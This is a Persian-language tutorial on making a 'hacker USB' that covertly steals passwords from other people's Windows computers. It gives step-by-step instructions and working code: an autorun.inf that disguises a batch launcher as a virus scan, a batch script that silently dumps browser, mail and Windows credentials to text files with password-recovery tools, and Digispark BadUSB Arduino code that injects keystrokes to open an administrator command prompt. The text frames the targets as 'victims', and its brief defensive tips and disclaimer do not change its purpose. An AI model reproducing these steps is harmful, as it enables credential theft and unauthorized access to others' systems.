فلش هکر + چگونه با یک فلش کل یک سیستم را هک کنیم؟ + هک با USB 🟢

فلش هکر نوعی از فلش است که می تواند به شما کمک کند تنها با وصل کردن یو اس بی هک یک کامپیوتر را سیستم را انجام دهید. در این مقاله می خواهیم جزئیات این نوع از فلش ها را برای شما توضیح دهیم.

فلش هکر چیست؟

همه ما آن فیلم های هک را دیده ایم که در آن هکرها یک USB را به سیستم متصل می کنند و به طور خودکار هک می شود. خب فانتزی نیست باور کنید یا نه، انجام این کار بسیار آسان است.  مهمتر از همه، شما به هیچ نرم افزار پولی پیشرفته یا چیزهای فانتزی نیاز ندارید. شما حتی به چیزی غیر از یک دفترچه یادداشت نرم افزار رایگان و یک USB نیاز ندارید. علاوه بر این، امروز نه یک، بلکه دو روش مختلف هک کردن با درایو USB را یاد می گیریم.

بنابراین بدون هیچ مقدمه ای، بیایید شروع کنیم.

الزامات:

اتصال اینترنت
درایو یا USB
صبر

1) USBStealer

USBStealer یک ابزار هکر رمز عبور USB مبتنی بر ویندوز است که به شما کمک می کند تا رمز عبور را از برنامه های مبتنی بر ویندوز مانند رمز عبور Chrome، رمز عبور فایرفاکس، NetPassword، رمزهای عبور مدیریت رایانه ویندوز و همچنین رمزهای عبور وای فای ذخیره شده در آن سیستم هک و استخراج کنید.

این نرم افزار را می توانید از صفحه رسمی GitHub پروژه دانلود کنید.

توجه: برای اینکه این هک کار کند، به یک سیستم ویندوز نیاز داریم. به هر حال ویندوز در برابر ویروس ها آسیب پذیرترین است. Admin Access برای نمایش تمام داده ها برای این اسکریپت توصیه می شود. اجباری نیست، اما بیشتر توابع به امتیازات مدیر نیاز دارند. این ابزار Password Hacker را اجرا کنید و رمز عبور را بشکنید تا عملیات pentest را انجام دهید.

مراحل این بخش

مرحله 1: اسکریپت هک USB را دانلود کنید

با کلیک بر روی لینک دانلود در پروژه Github نرم افزار را دانلود کنید.
مرحله 2: فایل ها را اکسترکت کنید

فایل های موجود در درایو USB خود را مطابق شکل استخراج کنید.
مرحله 3: اسکریپت USB Hacking را اجرا کنید

USB را به سیستم قربانی وصل کنید. حالا روی lasagna.exe کلیک کنید.
مرحله 4: از غارت لذت ببرید!

پس از اجرای فایل، تمام رمزهای عبور سیستم در یک پوشه مخفی با نام Loot ذخیره می شوند.
مرحله 5: اتصال را قطع کنید

Pendrive را از سیستم جدا کنید.

همانطور که در زیر در Pendrive خود در داخل پوشه loot نشان داده شده است، می توانید با استفاده از notepad به تمام رمزهای عبور هک شده دسترسی داشته باشید. هک کردن وب سایت هایی مانند فیس بوک و اینستاگرام برای این نرم افزار چیزی نیست.

تقریباً تمام رمزهای عبور یک سیستم ویندوز را هک می کند. اکنون می دانید که چگونه هکرها ویندوز کامپیوتر را با چیزی جز USB هک می کنند.

فلش هکر می تواند به یک سیستم متصل شود و با استفاده از روش های مختلف این سیستم را در دست بگیرد

اما اگر بخواهید حمله را حتی بیشتر خودکار کنید چگونه ممکن است؟

مرحله 1: سند متنی جدید

با کلیک راست بر روی فضای سفید، کلیک بر روی New و انتخاب Text Document، یک سند متنی در داخل USB ایجاد کنید.

مرحله 2: اسکریپت خودکار

خطوط کد زیر را به فایل متنی اضافه کنید و آن را به عنوان autorun.inf ذخیره کنید

[autorun] open=bitch.bat ACTION= Perform a Virus Scan

اگر نمی‌توانید پسوند فایل txt را در انتهای فایل سند جدید خود ببینید، باید به صورت دستی ویژگی ویندوز را غیرفعال کنید، پسوندهای فایل را پنهان کنید. مانند تصویر زیر می توانید آن را در بخش view پیدا کنید.

(This PC) >

View>

Filename extensions

ادامه مراحل ساخت فلش هکر:

مرحله 3: پاپ آپ را به صورت خودکار اجرا کنید

اکنون، وقتی قلم درایو/USB را در سیستم ویندوز قرار می دهید، اسکریپت اتوران اجرا می شود و پنجره ای باز می شود که از قربانی (یا شما) می خواهد که یک اسکن ویروس را انجام دهید.
مرحله 4: اسکن ویروس را انجام دهید (اسکریپت را به صورت مخفیانه اجرا کنید)

در پنجره پاپ آپ اولین گزینه یعنی انجام اسکن ویروس را انتخاب کنید.
مرحله 5: از غارت خودکار لذت ببرید

اکنون تمام اسکریپت‌های هک رمز عبور بی‌صدا در پس‌زمینه اجرا می‌شوند و درست مانند قبل، همه پسوردها در پوشه loot به شکل یک فایل TXT ذخیره می‌شوند.

تبریک می گویم که با موفقیت یک کامپیوتر ویندوز را با یک USB Pendrive هک کردید، درست مانند کاری که ربات مستر در برنامه تلویزیونی معروف انجام می دهد.

شسی تماس ناشناس

2) چگونه یک USB هک بسازیم؟

برای ایجاد USB هک خود، باید یک فایل دسته ای ایجاد کنید که به طور خودکار تمام نرم افزارهای مورد نیاز ما را اجرا کند

یک فایل دسته ای (همچنین به عنوان اسکریپت دسته ای شناخته می شود) به شما امکان می دهد وظایف را در ماشین های ویندوز به طور خودکار انجام دهید. ما قصد داریم از همان نوع اسکریپت استفاده کنیم تا همه اسکریپت های هک خود را اجرا کنیم و داده های رمز عبور آنها را به فایل های متنی صادر کنیم.

مرحله 1: ابزارها را دانلود کنید

به وب‌سایت رسمی Nirsoft بروید و تمام بسته‌هایی که شامل همه ابزارهای اصلی بازیابی رمز عبور هستند را با خط فرمان su دانلود کنید.

پورت اینها ابزارهای هک هستند که ما قصد داریم از آنها برای استخراج رمز عبور استفاده کنیم. اگر پرسیده شد:

نام کاربری: دانلود

رمز عبور: nirsoft123!

فلش هکر باید برنامه نویسی ها را درون خودش داشته باشد

مرحله 2: فایل ها را استخراج کنید

با استفاده از برنامه ای مانند 7-Zip یا WinRAR فایل ها را در هر پوشه ای استخراج کنید. اگر پرسیده شد:

رمز عبور: nirsoft123!

مرحله 3: فایل های exe را در USB کپی کنید

تمام ابزارهایی را که در مرحله اول دانلود کرده اید دانلود کنید، آنها را در هر پوشه ای استخراج کنید. اکنون، فقط فایل های اجرایی (فایل های exe.) را در USB Pendrive خود کپی کنید.

به عنوان مثال، فایل‌ها – mspass.exe، mailpv.exe، iepv.exe، pspv.exe و passwordfox.exe را در درایو USB خود کپی کنید.

مرحله 4: اجرای خودکار اسکریپت برای فلش هکر

حالا یک سند متنی ایجاد کنید و کد زیر را به اسکریپت اضافه کنید:

[autorun] open=launch.bat ACTION= Perform a Virus Scan

دفترچه یادداشت را ذخیره کنید و نام آن را از New Text Document.txt به autorun.inf تغییر دهید. توجه: مطمئن شوید که فایل autorun.inf باید در پوشه USB Root باشد. داخل هیچ پوشه دیگری نیست..

شسی برنامه های مشابه تلگرام

مرحله 5: اسکریپت هک USB

یک فایل متنی دیگر با notepad ایجاد کنید و خطوط کد زیر را روی اسکریپت بنویسید:

start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt

فایل متنی notepad را ذخیره کنید و نام آن را از New Text Document.txt به launch.bat تغییر دهید. درست مثل autorun. inf مطمئن شوید که فایل در پوشه اصلی درایو USB قرار دارد

اکنون روت کیت هک USB شما برای هک قربانیان شما آماده است.

فقط این مراحل را دنبال کنید:

مرحله 1: اکنون، وقتی قلم درایو/USB را در سیستم ویندوز قرار می دهید، اسکریپت اتوران اجرا می شود و پنجره ای ظاهر می شود که از قربانی (یا شما) می خواهد که یک اسکن ویروس را انجام دهید.

2: در پنجره پاپ‌آپ autorun، اولین گزینه را انتخاب کنید که می‌گوید “Perform a Virus Scan”.

مرحله 3: اکنون، همه ابزارهای هک رمز عبور بی صدا در پس زمینه اجرا می شوند. به سختی یک ثانیه طول می کشد. پسوردهای هک شده در فایل های TXT ذخیره می شوند.

مرحله 4: قلم درایو را حذف کنید و تمام رمزهای عبور هک شده را در فایل های the.TXT مشاهده خواهید کرد.

تبریک می گویم شما یاد گرفتید که چگونه هر سیستم ویندوز را با درایو USB هک کنید.

شسی حملات غیر فعال سایبری

چگونه از خود در برابر فلش هکر محافظت کنید؟

محافظت از خود دشوار است زیرا انجام هک بسیار آسان و در عین حال بسیار قدرتمند است، اما می توانید اقدامات زیر را برای جلوگیری از هک انجام دهید.

اجازه ندهید کسی از سیستم شخصی شما استفاده کند.
اتوران را غیرفعال کنید
یک آنتی ویروس خوب نصب کنید.
رمز عبور را در مرورگرها ذخیره نکنید.

سوالات متداول درباره فلش هکر:

Q1. آیا این هک قانونی است؟

خیر، این هک به هیچ وجه قانونی نیست. این مقاله فقط برای اهداف آزمایشی و آموزشی است. لطفا از این ابزار فقط برای اهداف آموزشی استفاده کنید.

فلش هکر می تواند از روش های مختلفی حملات خود را به سیستم انجام دهد

Q2. روی ویندوز 10 کار میکنه؟

بله، روی ویندوز 10 کار می کند. اتوران ممکن است بسته به تنظیمات ویندوز و همچنین نسخه کار کند یا نه.

تا اینجای کار شما روش ساخت فلش هکر را یاد گرفته اید. اما ممکن است این آموزش تا اینجا برای شما سخت باشد. در واقع هکر های حرفه ای یا برنامه نویس ها افرادی هستند که می توانند این کار را انجام دهند. اما برای افرادی که مبتدی تر هستند از این جا به بعد می تواند ساده تر ساخت فلش هکر را دنبال کند.

چگونه یک دستگاه USB هک قابل برنامه ریزی برای نفوذ به رایانه های شخصی ساختم؟

بنابراین من آنجا بودم، لحظه بسیار مهمی بود. من دقیقاً در کنار سیستم ایستاده بودم اما نتوانستم کاری انجام دهم زیرا افراد دیگری در اتاق بودند. دسترسی به این دستگاه می‌تواند به معنای واقعی کلمه همه چیز را برای من تغییر دهد، کاش می‌توانستم یک دستگاه USB یا چیزی که بتواند کار را در 10 ثانیه انجام دهد و سپس می‌توانستم آن را بدون باقی گذاشتن ردی حذف کنم.

تا به حال این احساس را داشته اید که در بالا توضیح دادم، زمانی که برای مدت کوتاهی به یک سیستم دسترسی داشتید و می خواهید مجموعه خاصی از دستورات را اجرا کنید، اما نمی توانید آن را تحت شرایط انجام دهید. خوب پس این مقاله برای شما ضروری است.

BadUSB چیست؟

BadUSB چیزی نیست جز یک چیپست که پیکربندی شده است تا به عنوان یک صفحه کلید با مجموعه ای از ضربه های کلید از پیش برنامه ریزی شده عمل کند که به محض وصل شدن به سیستم فعال می شوند. این یکی از ساده ترین تعاریفی است که می توان در مورد BadUSB ارائه داد. واقعیت می تواند کمی پیچیده تر از این باشد.

Rubber Ducky

Rubber Ducky که در وب‌سایت HAK5 وجود دارد یکی از معروف‌ترین نمونه‌های BadUSB است که تقاضای بالایی دارد. اینها به گونه ای طراحی شده اند که به عنوان یک صفحه کلید عمل کنند، بنابراین سیستم بلافاصله آن را تشخیص می دهد و سپس کلید از پیش برنامه ریزی شده را اجرا می کند که می تواند از سرعت تایپ 1000 کلمه در دقیقه فراتر رود.

اما، هر کسی که مقالات من را دنبال کرده است، می‌داند که به همان اندازه که من خراب هستم، این را نخریده‌ام. بنابراین، من سعی کردم راهی برای ایجاد چنین چیزی پیدا کنم، نه آنقدر موثر اما به اندازه کافی نزدیک.

بیایید فلش هکر را تکمیل کنیم!

بنابراین، برای درک آنچه در پس‌زمینه اتفاق می‌افتد، چند مقاله خواندم و متوجه شدم که چیپست Digispark ATTINY85 را می‌توان برای تکرار عملی که Rubber Ducky انجام می‌دهد استفاده کرد و می‌توان آن را به عنوان یک صفحه کلید برای اجرای دستورات خاص فریب داد.

این چیپست را می توان با استفاده از Arduino IDE برنامه ریزی کرد و پس از قرار دادن آن در رایانه شخصی، آن دستورات را می توان اجرا کرد.

مرحله 1:

ما باید درایورهای مورد نیاز چیپست Digispark ATTINY85 را دانلود و نصب کنیم. این نام را سرچ کنید و نسخه 32 بیتی یا 64 بیتی فایل مورد نیاز خود را دانلود کنید.

گام 2:

آخرین نسخه Arduino IDE را دانلود کنید که در آن کدهای برنامه ریزی چیپست را می نویسید، از این لینک دیدن کنید. بسته به سیستم عاملی که استفاده می کنید، IDE را دانلود کنید.

مرحله 3:

پس از دانلود Arduino IDE، آن را باز کنید و سپس به File -> Preferences بروید. در فیلد ورودی با نام “Additional Boards Manager URLs” URL زیر را وارد کنید.

http://digistump.com/package_digistump_index.json

مرحله 4:

پس از انجام مراحل زیر، به Tools -> Board -> Boards Manager بروید. در اینجا بر روی Search Filter کلیک کنید و Digistump AVR Boards را تایپ کنید که بسته در زیر ظاهر می شود و سپس روی install در گوشه سمت راست کلیک کنید.

نصب این بسته به سرعت اینترنت شما ممکن است کمی زمان ببرد.

مرحله 5:

این آخرین مرحله ای است که باید قبل از شروع برنامه نویسی انجام دهید، به Tools -> Board بروید. به پایین بروید تا گزینه Digispark (پیش‌فرض – 16.5 مگاهرتز) را مشاهده کنید و سپس روی آن کلیک کنید تا آن را انتخاب کنید.

این مراحلی است که باید انجام دهید تا سیستم خود را به درستی تنظیم کنید تا هنگام کدنویسی در Arduino IDE مطابق با آن کار کند. این تنظیم ممکن است کمی طول بکشد، اما می‌توان از آن برای خودکار کردن تنظیمات زیادی در زمان بسیار کمی استفاده کرد و در زمان گرانبهای زیادی که ممکن است نخواهید در طول یک آزمون قلم یا چیزی شبیه به آن از دست بدهید، صرفه‌جویی می‌شود.

مرحله 6: (برنامه نویسی)

اکنون که تمام مراحل به درستی انجام شده است، ادامه دهید و Arduino IDE را باز کنید و برنامه ای را که می خواهید تراشه اجرا کند را تایپ کنید. برنامه های چیپست ATTINY85 کمی با برنامه های Rubber Ducky متفاوت است.

در اینجا یک اسکریپت وجود دارد که به شما کمک می کند تا cmd را با امتیازات ادمین در ویندوز 10 فعلی باز کنید.

#include "DigiKeyboard.h"
void setup() 
{ 
 // leave it empty
}void loop()
{
 DigiKeyboard.delay(5000); // time is measured in milliseconds
 DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT); // open windows menu
 DigiKeyboard.delay(1000);
 DigiKeyboard.print(“cmd”); // to search for command prompt
 DigiKeyboard.delay(1000);
 DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);
 DigiKeyboard.delay(1000);
 DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 for(;;) { } // to stop executing the loop
}

هنگامی که کد بالا در Arduino IDE قرار گرفت و سپس آن را کامپایل کرد، چیپ ست را تا زمانی که پیامی را که در اولین اجرای اسکریپت چند ثانیه طول می‌کشد ارسال نکند، وارد نکنید. به محض اینکه پیامی مبنی بر درج چیپست داد، ادامه دهید و آن را وارد کنید. و بگذارید جادو شروع شود!. با همین مراحل فلش هکر خود را ساخته اید.

برای جلوگیری از حملاتی مانند موارد فوق قوانین زیر را دنبال کنید:

الف) مراقب دستگاه های خود باشید و از دسترسی فیزیکی افراد غیرقابل اعتماد به دستگاه خود منع کنید.

ب) می‌توانید از این مسدودکننده‌های پورت برای جلوگیری از عبور کسی که می‌تواند دستگاه‌های USB را در سیستم شما وارد کند، استفاده کنید، برای خرید روی این لینک کلیک کنید.

.

ج) می‌توانید از duckhunt استفاده کنید، بر اساس سرعتی که اسکریپت خودکار در دستوراتی تایپ می‌کند که آن را شناسایی می‌کند و سپس آن را به طور کامل متوقف می‌کند.